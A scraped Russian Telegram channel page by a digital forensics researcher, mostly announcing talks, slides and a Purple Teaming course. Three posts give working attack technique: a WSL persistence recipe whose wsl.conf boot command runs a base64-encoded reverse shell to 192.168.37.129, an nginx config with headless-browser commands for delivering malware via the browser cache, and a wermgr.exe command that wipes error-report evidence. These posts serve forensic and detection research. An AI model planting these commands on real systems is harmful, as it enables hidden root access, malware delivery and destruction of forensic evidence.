Garden Detective


Гео и язык канала: Россия, Русский
Категория: Технологии


DFIR... но на этом не останавливаемся.
Администратор: @SmartGlue

Связанные каналы

Гео и язык канала
Россия, Русский
Категория
Технологии
Статистика
Фильтр публикаций


#conferences
Уже начинаю превращаться в деда, так как всё время забываю написать в канал, что CyberCamp на своей платформе добавил видео выступлений с летнего фестиваля, который проходил 17 июля.

И конечно, кто я такой, чтобы не посоветовать вам глянуть наши с Иваном Груздом выступления про группировку GOFFEE.
🔵 «Чтобы найти атакующего, иногда приходится провести двадцать лет вместе © кибербарон Мюнхгаузен»
💻 Запись выступления

🔵 «Неужели обязательно нужно снести инфраструктуру, чтобы выгнать атакующих? © кибербарон Мюнхгаузен»
💻 Запись выступления

🟣 Помимо этого, я подготовил таблицу со всеми своими выступлениями, начиная с конца 2023 года (24 работы!). Она будет обновляться с появлением новых докладов. Там будут находиться как ссылки на презентации, так и на записи выступлений (если они вообще есть).
🚪 Ссылка на таблицу со всеми моими выступлениями 🚪


#mfd2026
🔵 Выкладываю презентацию доклада «DFIR vs WSL: цифровая криминалистика на стыке миров» с конференции Moscow Forensics Day 2026.
Цифровая криминалистика + WSL? Второе — точно, а чтобы узнать про первое — придётся открыть презентацию.
💻 Ссылка на презентацию


Azerskiy_V_ThreatZone_OFFZONE2026.pdf
5.8Мб
#offzone2026
🔵 Время уже выложить презентацию доклада «Jump Lists: Your Trace, My Trap», который был на треке Threat.Zone 🥴
*что-то там про криминалистический артефакт Jump Lists и то, как он может быть использован атакующими, пентестерами или Red Team*
💻 Ссылка на презентацию


#events #blog
Немного новостей:
🔵 21 августа, 15:00–15:30: буду выступать на конференции OFFZONE 2026 с докладом «Jump Lists: Your Trace, My Trap».
Jump Lists — артефакт, хорошо знакомый каждому DFIR‑специалисту. По нему восстанавливают хронологию действий пользователя, находят следы открытия файлов/каталогов и выявляют подозрительную активность. Но что, если посмотреть на него с другой стороны — глазами offensive‑специалиста?
Уже на этой неделе, приходите 🚪

🔵 4 сентября, 12:15–12:35: другое мероприятие — Moscow Forensics Day 2026, где я представлю доклад «DFIR vs WSL: цифровая криминалистика на стыке миров».

🔵 Также подал доклад на ZeroNights 2026 и теперь в ожидании результатов от CFP комитета (если примут, то снова поговорим про обход «песочниц»).

🔴 Ну и конечно, советую прочитать новую статью от Лаборатории F6, вышедшую сегодня. Там мы разбираем TTPs группировки GOFFEE (Paper Werewolf), которые встретили в рамках IR.
Про данную APT-группировку мы с Иваном Груздом ещё рассказывали на летнем фестивале CyberCamp (ссылка 💻).


#cybercamp2026 #leto
17 июля совместно с Иваном Груздом мы выступили с двумя докладами на летнем фестивале CyberCamp, где затронули кейс с APT-группировкой.

🔵 На сцене докладов: «Чтобы найти атакующего, иногда приходится провести двадцать лет вместе © кибербарон Мюнхгаузен»
Рассмотрим хронологию затяжной APT-атаки. Вы узнаете, как хакеры годами оставались незамеченными, какие техники закрепления использовали и как скрывали сетевые следы. Имя этой группировки пока держим в секрете, но масштаб вас впечатлит.
💻 Ссылка на презентацию

🔵 На сцене практики: «Неужели обязательно нужно снести инфраструктуру, чтобы выгнать атакующих? © кибербарон Мюнхгаузен»
Конкретные примеры и пошаговая проверка гипотез. Спикеры объяснят, как находить «приветы из прошлого», превентивно блокировать домены злоумышленников и проводить форензику при остром дефиците данных.
💻 Ссылка на презентацию

А насчет самого мероприятия буду краток: всё как всегда на высшем уровне! 😘


Видео недоступно для предпросмотра
Смотреть в Telegram
#persistence #standofftalks2026
🔵 Вот и прошёл Standoff Talks 2026, и пора выложить презентацию доклада, с которой выступал 19 июня, — «Нельзя просто так взять и… не использовать Obsidian в атаке».
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

🔵 Кратко о том, что было в докладе:
➖ ПО для заметок Obsidian и система плагинов;
➖ разбор атаки кампании REF6598;
➖ обход Restricted Mode;
➖ использование Obsidian CLI;
➖ PoC описанного в докладе сценария (хорошее закрепление для любителей оставлять свои "заметки").
*️⃣код PoC (когда-нибудь я буду нормально оформлять репозитории, но это не точно 🥳);
*️⃣ну и конечно, куда же без видео 🚪.


AzerskiyVlad_CIRF2026.pdf
5.5Мб
#anti_forensics #DFIR #cirf2026
🔵 Вчера (23.04.2026) проходила конференция CIRF 2026, на которой я выступил с докладом "Генеральная уборка в Windows: искусство заметать цифровые следы". Да, и это снова одна из моих любимых тем — контр-криминалистические методы. 🚪
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

🔵 Отдельно хочу отметить организацию конференции и выступления других спикеров — всё было на высшем уровне. 🏖


Я в своем познании Purple Teaming настолько преисполнился, что решил: настало время делиться опытом. Поэтому мы вместе с Олегом и нашими друзьями из Inseca разработали 6-недельный курс по данному направлению.

Какие темы затронем на курсе:
1️⃣Что такое Purple Teaming и почему вам стоит им заниматься?
2️⃣Как подготовиться к киберучениям в подобном формате и как сделать их процессом?
3️⃣Что такое эмуляция действий атакующих, где брать данные для нее, и как с ними работать?
4️⃣Как разрабатывать детектирующую логику и когда этим следует заниматься?
5️⃣Что такое Threat Hunting, когда и кому он нужен?
6️⃣Как проводить киберучения и как автоматизировать этот процесс?

Старт курса намечен на 13 марта, а следовательно, для читателей канала есть приятный бонус: скидка 10% по промокоду gardendetective.

1k 1 12 2 29

Видео недоступно для предпросмотра
Смотреть в Telegram
#persistence #t1037 #wsl
🔵 Копаясь в документации Microsoft по подсистеме WSL (Windows Subsystem for Linux), нашёл интересный механизм закрепления. В каждом инстансе можно создать файл /etc/wsl.conf и в секции [boot] указать для параметра command команду, которая будет выполняться с правами root при каждом его запуске.

Пример содержимого файла /etc/wsl.conf (запуск обратной оболочки):
[boot]
command=echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM3LjEyOS8yMjIyIDA+JjE= | base64 -d | /bin/bash

🔴 Представим сценарий, в котором атакующий удалённо подключился по протоколу RDP к рабочей станции ИТ-администратора под управлением ОС Windows 11, на которой включен WSL2 и настроен Linux-дистрибутив.
Цель злоумышленника — закрепиться в системе через файл /etc/wsl.conf.

Команды (cmd.exe, powershell.exe; запуск без прав Администратора):
wsl -l -v
wsl -u root -d --exec bash -c "echo -e '[boot]\ncommand=echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM3LjEyOS8yMjIyIDA+JjE= | base64 -d | /bin/bash' > /etc/wsl.conf"
Пссс... После получения обратной оболочки... Напоминаю: из WSL по умолчанию можно запускать исполняемые файлы Windows.

🔵 Дополнительные моменты:
➖После внесения изменений в конфигурационный файл /etc/wsl.conf, полезная нагрузка, указанная в command, выполнится при следующем запуске инстанса WSL. Некоторые нюансы работы экземпляра WSL:
*️⃣в сборке 18267 Microsoft добавили механизм таймаута завершения работы инстанса WSL, и он по умолчанию установлен на 15 секунд. Это означает, что экземпляр будет остановлен через 15 секунд после завершения последнего процесса WSL;
*️⃣если под процессом /init (PID 2) в WSL запущен хотя бы один пользовательский процесс (например, в фоновом режиме), то экземпляр WSL не будет завершён (ссылка);
Пример:
nohup python3 -m http.server 8000 &
*️⃣для того, чтобы принудительно завершить работу определённого дистрибутива или всех сразу, можно использовать эти команды:
wsl -t
wsl --shutdown


#socforum2025 #zeronights2025
🔵 Последние 2 доклада в этом году (🍩):

1️⃣ Доклад «После Red Team можно не бояться атак... Не бояться атак, да?» [SOC Forum 2025].
➖ Совместно с Олегом Скулкиным (ссылка на TG-канал).
Описание доклада:
В докладе рассмотрим различия в тактиках, техниках и процедурах (TTP) между реальными хакерскими группировками и командами Pentest / Red Team. Эта разница объясняется тем, что профили атак, используемые в пентестах, часто не отражают реальные угрозы.

Доклад поможет понять, как отличать инциденты, связанные с реальными атаками, от имитаций, а также почему реагирование на «пентестовые» сценарии могут привести к ложному чувству защищенности.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

2️⃣ Доклад «Горшочек, не вари! Истории про Web3-ловушки» [ZeroNights 2025].
➖ Совместно с Николаем Микрюковым (@Nmikryukov).
Описание доклада:
Смарт-контракты, которые только притворяются уязвимыми... В нашем докладе мы рассмотрим существующие и ранее применявшиеся в Web3 трюки децентрализованных ханипотов.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.


#cybercamp2025 #DFIR #task
🔵 Настало время опубликовать пост с веб-ссылками на доклады и разбором одного задания с 'https://t.me/jetcybercamp/10/20534' rel='nofollow'>CyberCamp 2025. Максимальная концентрация DFIR. 🍩

1️⃣ Доклад «Первое правило CI/CD-клуба: компрометация начинается с доверия».
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

2️⃣ Разбор задания «Горький коммит».
*️⃣Ссылка на презентацию;
*️⃣Запись эфира с разборами кейсов.
P.S.: в разборе присутствуют 2 веб-ссылки на дополнительный материал:
➖подготовка к эмуляции атаки;
➖эмуляция действий атакующих.

🔵 И конечно, не могу не упомянуть доклады от своих любимок (😍):

3️⃣Доклад «ИБ-специалист в отпуске? Поздравляю, теперь ты – инцидент-респондер!» от Ивана Грузда.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

4️⃣Доклад «Чертовски хороший Compromise Assessment» от Анастасии Петровой.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.


#events
🔵 Пришло время для нового поста! А после него начну публиковать интересные исследования — ждите их в декабре. Пора освежить канал не только рассказами о выступлениях, но и чем-то новым. 🍩

1️⃣Про SOC Forum я уже писал в предыдущем посте, но напомню, что 20 ноября будет доклад на тему «После Red Team можно не бояться атак... Не бояться атак, да?». Да-да, там также будут мемы. Куда же без них!

2️⃣А 21 ноября будет эфир, завершающий арку CyberCamp 2025.
На нём будет:
➖ разбор четырех заданий их авторами: «Горький коммит» из соло-программы (моё наследие; будет разбор данного задания от меня🍩), а из командных киберучений — to My Curious Programmer, «Политик аналитик», NightCall;
➖ подведение итогов кэмпа и статистика — самые интересные доклады и задания, самые активные участники, обсуждение обратной связи и планов на будущее;
➖ возможность выиграть еще немного мерча!

3️⃣И напоследок, 26 ноября совместно с Николаем Микрюковым (@Nmikryukov) будем выступать на конференции ZeroNights 2025 с докладов «Горшочек, не вари! Истории про Web3-ловушки», где расскажем про существующие и ранее применявшиеся в Web3 трюки децентрализованных ханипотов.

Ну и мем для привлечения внимания 🥳


#events
🔵 Уже почти конец года, но различных выступлений и активностей так и не убавилось.🚪

1️⃣Начнём с самого интересного — это CyberCamp 2025 (ну просто любимки). В первый день докладов кэмпа (21 октября) можно будет погрузиться в мир тайн компрометации. Поэтому рекомендую послушать эти три доклада.
Также в данном году появился новый формат — консультации, где можно задать свои животрепещущие вопросы спикерам по различным темам. Если хочется обсудить Incident Response, Compromise Assessment или Purple Teaming, то регистрируйтесь — пообщаемся на эти темы без лишней душноты. 💻
P.S.: планируется какой-то секретный эфир. Что именно это будет, пока остается загадкой.

UPDATE: секретный эфир.

2️⃣На конференция SOC Forum 2025 будет доклад "После Red Team можно не бояться атак... Не бояться атак, да?" (20 ноября). Совместно с Олегом поговорим про различия... между реальными хакерскими группировками и командами Pentest/Red Team.

3️⃣И последнее: подал 2 доклада на ZeroNights. Так что, ждём результатов от CFP комитета.




#uwp #DFIR #mfd2025
🔵 С 11 по 12 сентября проходила девятая ежегодная конференция — Moscow Forensics Day 2025.
На данном мероприятии выступал с докладом на тему "UWP под прицелом DFIR: что скрывают современные Windows-приложения".

Удалось осветить следующие пункты:
1️⃣ Что такое UWP (Universal Windows Platform) и MSIX-пакеты.
2️⃣ Инциденты ИБ, связанные с использованием MSIX-пакетов.
3️⃣ Криминалистические артефакты, возникающие при установке MSIX-пакета, и их источники.
4️⃣ Приложения из Microsoft Store, представляющие интерес для злоумышленников.

🔵 Также отдельно выкладываю список полезных веб-ресурсов/веб-ссылок (оформлено в Obsidian).

P.S.: уже в состоянии ожидания Moscow Forensics Day 2026 🚪


AzerskiyVD_ThreatZone_OffZone2025.pdf
6.1Мб
AzerskiyVD_FastTrack_OffZone2025.pdf
4.5Мб
#offzone2025
🔵 Прошла очередная конференция — OFFZONE 2025. Поэтому самое время выложить презентации докладов, с которыми я выступал на данном мероприятии.🚪

1️⃣ На следующей неделе выложу дополнительный материал к докладу "Охота на призраков: изучение сетевой инфраструктуры атакующих" — полезные веб-ресурсы и ссылки, оформленные в Obsidian.🤪

2️⃣ Также позже залью на свой GitHub скрипты из второго доклада, связанного с GitLab.

UPD:
*️⃣Запись выступления №1;
*️⃣Запись выступления №2.


#offzone2025
22 августа буду выступать на конференции OffZone 2025 с двумя докладами [🤪 которые я успешно доделал 🤪]. Буду рад видеть каждого, кто заглянет на мои выступления.

Расписание:
1️⃣"Охота на призраков: изучение сетевой инфраструктуры атакующих".
Трек: Threat.Zone.
Время: 12:30-13:00.
Описание.

2️⃣"Охота на тануки: узнаём точную версию GitLab".
Трек: Fast Track.
Время: 14:45–15:15.
Описание.


#pentestaward2025
Вчера побывал на ежегодной независимой премии для пентестеров Pentest Award 2025, организованной компанией Awillix (@justsecurity). И да, ивент уже третий год стабильно набирает обороты. 🚪

Я был приятно удивлён, что смог занять второе место в номинации «РАЗ BYPASS, ДВА BYPASS", где в своей работе затронул такие темы, как: обход Sandbox, антифорензика и многое другое (да-да, об этом подробнее расскажу чуть позже). 💻

И отдельно хочется поблагодарить организаторов и жюри за большую работу — как по организации этого уникального и лампового мероприятия, так и за проверку 140 работ (!!!), отправленных в этом году. 😘

С самой трансляцией можно ознакомиться тут.
Ну и хотелось бы выделить @Russian_OSlNT, который ворвался на этот ивент и собрал несколько побед. Поздравляю!


Видео недоступно для предпросмотра
Смотреть в Telegram
#phishing #browser_cache
🔵 На конференции Insomnihack 2025 исследователь компании Orange Cyberdefense представил доклад, посвящённый способу доставки вредоносного ПО с использованием механизмов кэширования веб-браузеров (статья №1, статья №2).
К данной работе хотелось бы добавить некоторое расширение, которое будет рассмотрено ниже. Но сначала кратко пройдёмся по основам.

🔵 Система кэширования веб-браузеров хранит следующие типы данных:
🔹HTML-файлы;
🔹CSS-файлы;
🔹JavaScript-файлы;
🔹медиафайлы;
🔹веб-шрифты.

Однако возникает вопрос: «Как веб-браузеры определяют, какие файлы необходимо добавить в кэш?»
Здесь всё довольно просто — используется HTTP-заголовок Content-Type, который можно контролировать на стороне веб-сервера.

🔴 Настройка сервера атакующей стороны:

Конфигурационный файл Nginx (/etc/nginx/sites-available/default):
...
location /i_am_not_malware.zip {
add_header NOTMALWARE "purple_team_test";
types { } default_type image/jpeg;
}
...

Главная страница веб-сайта (/var/www/html/index.html):
...

...

🔴 Расширение.
В самом докладе рассматривается пример, при котором пользователю требуется перейти на фишинговый веб-сайт, чтобы файл сохранился в кэше. Однако описанный способ можно применить и в другом виде. Например, можно прописать в LNK-файле ("классическое" вложение в письме) команду перехода на сайт с помощью веб-браузера в headless-режиме (см. ниже). В данном случае файл также будет добавлен в кэш.

Команда №1 (Mozilla Firefox; движок Quantum):
"C:\Program Files\Mozilla Firefox\firefox.exe" --headless --url http:///index.html
Примечания:
*️⃣одновременная работа нескольких независимых процессов с одним профилем Firefox невозможна. Поэтому необходимо либо завершить текущий процесс firefox.exe, либо использовать отдельный профиль (создать) для нового процесса:
"C:\Program Files\Mozilla Firefox\firefox.exe" --createprofile sidekick
"C:\Program Files\Mozilla Firefox\firefox.exe" --P sidekick --headless --url http:///index.html
*️⃣Каталог расположения кэша: %LOCALAPPDATA%\Mozilla\Firefox\Profiles\*.*\cache2\entries.

Команды №2 (Microsoft Edge, Google Chrome и т.п.; движок Chromium):
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --disable-gpu --disk-cache-size=1073741824 --dump-dom https:///index.html
"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --user-data-dir="%USERPROFILE%\AppData\Local\Chrome\purple" --disk-cache-size=1073741824 --dump-dom https:///index.html
Примечания
:
*️⃣в headless-режиме Google Chrome необходимо указать отдельный каталог для хранения пользовательских данных (параметр --user-data-dir), иначе после завершения сессии кэш и другие данные будут удалены;
*️⃣если файл достаточно большой, рекомендуется увеличить объём кэша на диске (параметр --disk-cache-size), например, до 100 Мбайт;
*️⃣Каталог расположения кэша MSEdge (headless-режим): %LOCALAPPDATA%\Temp\HeadlessEdge*\Default\Cache\Cache_Data.


#lolbas #anti_forensics #wer
🔵 Сегодня мы рассмотрим один из контр-криминалистических методов — использование нативной утилиты wermgr.exe ОС Windows для удаления WER-файлов. Данный исполняемый файл связан со службой Windows Error Reporting (WER), которая отвечает за сбор и отправку отладочной информации о сбоях как системных, так и сторонних приложений в Windows.

Например, при падении приложения будет сгенерирован отчёт Report.wer. Он полезен DFIR-специалисту, поскольку содержит информацию о:
🔹возникшей ошибке;
🔹полном пути к исполняемому файлу;
🔹подгружаемых DLL;
🔹SHA-1 хеше исполняемого файла (начиная с ОС Windows 10).

🔴 С помощью параметра -purgestores происходит удаление данных из следующих каталогов (см. скриншоты из Process Monitor от Sysinternals, приложенные к данному посту):
*️⃣%ProgramData%\Microsoft\Windows\WER\ReportArchive;
*️⃣%ProgramData%\Microsoft\Windows\WER\ReportQueue;
*️⃣%ProgramData%\Microsoft\Windows\WER\Temp.

Команда:
wermgr.exe -purgestores

🔵 При создании детектирующего правила следует учитывать наличие параметра -purgestores в командной строке процесса wermgr.exe.

🔵 Тесты проводились на ОС Windows 10 (21H2), а запуск команды осуществлялся под привилегированной учётной записью.

Показано 20 последних публикаций.